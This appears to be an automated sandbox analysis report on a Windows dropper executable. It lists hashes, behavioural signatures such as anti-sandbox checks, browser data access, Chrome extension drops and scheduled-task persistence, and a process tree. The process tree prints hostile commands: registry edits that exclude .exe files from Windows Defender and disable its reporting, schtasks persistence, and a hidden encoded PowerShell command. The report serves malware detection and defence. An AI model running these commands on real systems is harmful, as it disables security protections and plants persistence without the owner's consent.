Analysis
-
max time kernel
148s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20231020-en -
resource tags
arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system -
submitted
11/11/2023, 21:00
Static task
static1
General
-
Target
1f4728d86a831076e328fafd11302f1f2b64cb19a78bd5a2d9d7d70c24aebbc3.exe
-
Size
7.3MB
-
MD5
9e8f3496a67c7809d503f7aab6355ac7
-
SHA1
9f46460cd70c2403c51842ce65463a9161ed4f53
-
SHA256
1f4728d86a831076e328fafd11302f1f2b64cb19a78bd5a2d9d7d70c24aebbc3
-
SHA512
8f260926c1258f603f15d861ac8ac0edc2c6da9d26dcefc0c9655097cf358c9d2346d35eac4658e83fd520507f91358c5bc134f2c96b3c5df2f0607c1e5eb11f
-
SSDEEP
196608:91OkoBbz1HNn0BVQWr2VTey7MffxGtvj+FNE:3O7bzeQBCsUavj+FG
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 105 4120 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation IwvjcXK.exe -
Executes dropped EXE 4 IoCs
pid Process 4352 Install.exe 1204 Install.exe 1680 RzsCgqp.exe 5096 IwvjcXK.exe -
Loads dropped DLL 1 IoCs
pid Process 4120 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json IwvjcXK.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json IwvjcXK.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini IwvjcXK.exe -
Drops file in System32 directory 29 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies IwvjcXK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft IwvjcXK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA IwvjcXK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_5A8DA7E75009D0EA2C79217981FF930C IwvjcXK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 IwvjcXK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA IwvjcXK.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol IwvjcXK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8C0A4A9E1CEFEB34D84E7975A8A5D28F IwvjcXK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE IwvjcXK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData IwvjcXK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8C0A4A9E1CEFEB34D84E7975A8A5D28F IwvjcXK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA IwvjcXK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_17A1BB9C6401DC9652040571BD192211 IwvjcXK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_11314361DFE3E655E02EC2E7F9346EC1 IwvjcXK.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol RzsCgqp.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini RzsCgqp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 IwvjcXK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache IwvjcXK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 IwvjcXK.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_11314361DFE3E655E02EC2E7F9346EC1 IwvjcXK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_17A1BB9C6401DC9652040571BD192211 IwvjcXK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content IwvjcXK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 IwvjcXK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA IwvjcXK.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_5A8DA7E75009D0EA2C79217981FF930C IwvjcXK.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\kpvgWGyvU\GwUmXr.dll IwvjcXK.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi IwvjcXK.exe File created C:\Program Files (x86)\kpvgWGyvU\NXDbdfM.xml IwvjcXK.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak IwvjcXK.exe File created C:\Program Files (x86)\wStPwHPBGQsuC\ZBLaTZV.dll IwvjcXK.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi IwvjcXK.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja IwvjcXK.exe File created C:\Program Files (x86)\BjJZYiuqlPgU2\JcNTUXN.xml IwvjcXK.exe File created C:\Program Files (x86)\FcokcjqiGXWmUJvFooR\YQfrzmI.dll IwvjcXK.exe File created C:\Program Files (x86)\FcokcjqiGXWmUJvFooR\fLFkUzx.xml IwvjcXK.exe File created C:\Program Files (x86)\wStPwHPBGQsuC\MZlHEES.xml IwvjcXK.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak IwvjcXK.exe File created C:\Program Files (x86)\BjJZYiuqlPgU2\EGnweUlmKXFrM.dll IwvjcXK.exe File created C:\Program Files (x86)\DIGofpDPDqUn\HOcoTeA.dll IwvjcXK.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bqEFPgBHoYySYAkccD.job schtasks.exe File created C:\Windows\Tasks\bdrESRlZGEayfzFZZ.job schtasks.exe File created C:\Windows\Tasks\unWYiNUJqAlITwd.job schtasks.exe File created C:\Windows\Tasks\jRVNJXEqUfFueAuNO.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3084 schtasks.exe 3456 schtasks.exe 4348 schtasks.exe 3656 schtasks.exe 4616 schtasks.exe 3060 schtasks.exe 4908 schtasks.exe 1372 schtasks.exe 3360 schtasks.exe 2928 schtasks.exe 4232 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket IwvjcXK.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" IwvjcXK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "3" IwvjcXK.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" IwvjcXK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" IwvjcXK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer IwvjcXK.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix IwvjcXK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ IwvjcXK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{650106ce-0000-0000-0000-d01200000000}\MaxCapacity = "14116" IwvjcXK.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume IwvjcXK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing IwvjcXK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" IwvjcXK.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3544 powershell.EXE 3544 powershell.EXE 3788 powershell.exe 3788 powershell.exe 3788 powershell.exe 4480 powershell.exe 4480 powershell.exe 4480 powershell.exe 1476 powershell.EXE 1476 powershell.EXE 1476 powershell.EXE 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe 5096 IwvjcXK.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3544 powershell.EXE Token: SeDebugPrivilege 3788 powershell.exe Token: SeDebugPrivilege 4480 powershell.exe Token: SeDebugPrivilege 1476 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3296 wrote to memory of 4352 3296 1f4728d86a831076e328fafd11302f1f2b64cb19a78bd5a2d9d7d70c24aebbc3.exe 89 PID 3296 wrote to memory of 4352 3296 1f4728d86a831076e328fafd11302f1f2b64cb19a78bd5a2d9d7d70c24aebbc3.exe 89 PID 3296 wrote to memory of 4352 3296 1f4728d86a831076e328fafd11302f1f2b64cb19a78bd5a2d9d7d70c24aebbc3.exe 89 PID 4352 wrote to memory of 1204 4352 Install.exe 90 PID 4352 wrote to memory of 1204 4352 Install.exe 90 PID 4352 wrote to memory of 1204 4352 Install.exe 90 PID 1204 wrote to memory of 2620 1204 Install.exe 92 PID 1204 wrote to memory of 2620 1204 Install.exe 92 PID 1204 wrote to memory of 2620 1204 Install.exe 92 PID 1204 wrote to memory of 3000 1204 Install.exe 94 PID 1204 wrote to memory of 3000 1204 Install.exe 94 PID 1204 wrote to memory of 3000 1204 Install.exe 94 PID 2620 wrote to memory of 4640 2620 forfiles.exe 96 PID 2620 wrote to memory of 4640 2620 forfiles.exe 96 PID 2620 wrote to memory of 4640 2620 forfiles.exe 96 PID 3000 wrote to memory of 4320 3000 forfiles.exe 97 PID 3000 wrote to memory of 4320 3000 forfiles.exe 97 PID 3000 wrote to memory of 4320 3000 forfiles.exe 97 PID 4320 wrote to memory of 2052 4320 cmd.exe 99 PID 4320 wrote to memory of 2052 4320 cmd.exe 99 PID 4320 wrote to memory of 2052 4320 cmd.exe 99 PID 4640 wrote to memory of 5096 4640 cmd.exe 98 PID 4640 wrote to memory of 5096 4640 cmd.exe 98 PID 4640 wrote to memory of 5096 4640 cmd.exe 98 PID 4640 wrote to memory of 3168 4640 cmd.exe 100 PID 4640 wrote to memory of 3168 4640 cmd.exe 100 PID 4640 wrote to memory of 3168 4640 cmd.exe 100 PID 4320 wrote to memory of 1228 4320 cmd.exe 101 PID 4320 wrote to memory of 1228 4320 cmd.exe 101 PID 4320 wrote to memory of 1228 4320 cmd.exe 101 PID 1204 wrote to memory of 4232 1204 Install.exe 102 PID 1204 wrote to memory of 4232 1204 Install.exe 102 PID 1204 wrote to memory of 4232 1204 Install.exe 102 PID 1204 wrote to memory of 3828 1204 Install.exe 104 PID 1204 wrote to memory of 3828 1204 Install.exe 104 PID 1204 wrote to memory of 3828 1204 Install.exe 104 PID 3544 wrote to memory of 4488 3544 powershell.EXE 108 PID 3544 wrote to memory of 4488 3544 powershell.EXE 108 PID 1204 wrote to memory of 1532 1204 Install.exe 120 PID 1204 wrote to memory of 1532 1204 Install.exe 120 PID 1204 wrote to memory of 1532 1204 Install.exe 120 PID 1204 wrote to memory of 3060 1204 Install.exe 122 PID 1204 wrote to memory of 3060 1204 Install.exe 122 PID 1204 wrote to memory of 3060 1204 Install.exe 122 PID 1680 wrote to memory of 3788 1680 RzsCgqp.exe 129 PID 1680 wrote to memory of 3788 1680 RzsCgqp.exe 129 PID 1680 wrote to memory of 3788 1680 RzsCgqp.exe 129 PID 3788 wrote to memory of 2552 3788 powershell.exe 132 PID 3788 wrote to memory of 2552 3788 powershell.exe 132 PID 3788 wrote to memory of 2552 3788 powershell.exe 132 PID 2552 wrote to memory of 2928 2552 cmd.exe 133 PID 2552 wrote to memory of 2928 2552 cmd.exe 133 PID 2552 wrote to memory of 2928 2552 cmd.exe 133 PID 3788 wrote to memory of 2884 3788 powershell.exe 134 PID 3788 wrote to memory of 2884 3788 powershell.exe 134 PID 3788 wrote to memory of 2884 3788 powershell.exe 134 PID 3788 wrote to memory of 4036 3788 powershell.exe 135 PID 3788 wrote to memory of 4036 3788 powershell.exe 135 PID 3788 wrote to memory of 4036 3788 powershell.exe 135 PID 3788 wrote to memory of 2452 3788 powershell.exe 136 PID 3788 wrote to memory of 2452 3788 powershell.exe 136 PID 3788 wrote to memory of 2452 3788 powershell.exe 136 PID 3788 wrote to memory of 3436 3788 powershell.exe 137 PID 3788 wrote to memory of 3436 3788 powershell.exe 137
Processes
-
C:\Users\Admin\AppData\Local\Temp\1f4728d86a831076e328fafd11302f1f2b64cb19a78bd5a2d9d7d70c24aebbc3.exe"C:\Users\Admin\AppData\Local\Temp\1f4728d86a831076e328fafd11302f1f2b64cb19a78bd5a2d9d7d70c24aebbc3.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3296 -
C:\Users\Admin\AppData\Local\Temp\7zS79D3.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4352 -
C:\Users\Admin\AppData\Local\Temp\7zS7D3E.tmp\Install.exe.\Install.exe /opkdidpuHZ "385121" /S3⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1204 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4640 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:5096
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:3168
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4320 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:2052
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1228
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gSRooshEv" /SC once /ST 11:53:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:4232
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gSRooshEv"4⤵PID:3828
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gSRooshEv"4⤵PID:1532
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bqEFPgBHoYySYAkccD" /SC once /ST 21:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\VVPOgfufcruankpaJ\AIrFuDqJGbmFMTI\RzsCgqp.exe\" ov /CTsite_idVhq 385121 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3060
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3544 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4488
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:1768
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:456
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2076
-
